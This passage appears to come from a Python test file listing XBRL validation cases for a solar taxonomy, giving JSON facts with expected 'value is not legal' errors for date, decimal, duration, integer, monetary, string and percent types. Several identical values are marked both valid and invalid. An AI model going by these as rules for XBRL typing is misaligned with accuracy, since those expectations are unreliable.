"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-02-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2017-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2019-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2020-02-29",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-07-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-07-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-09-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-13-02",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2016-02-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2017-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2019-02-29",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2020-02-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-09-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-1-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-1",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018_01_01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "01-01-2018",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "01/01/2018",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
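    # --- xbrli:decimalItemType cases. ---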
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.0",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
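    # --- xbrli:durationItemType: ISO 8601 durations accepted; misordered or malformed designators rejected. ---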
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT1004199059S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT130S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT2M10S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1DT2S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-P1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y2M3DT5H20M30.123S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1-Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1M2Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y-1M",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
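    # --- xbrli:integerItemType cases. ---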
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
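    # --- xbrli:monetaryItemType cases. ---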
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.99",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.9",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.999",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.99",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
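    # --- xbrli:stringItemType cases. ---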
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Sample String",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
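    # --- num:percentItemType: values outside the 0-100 range are rejected. ---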
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0.0",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
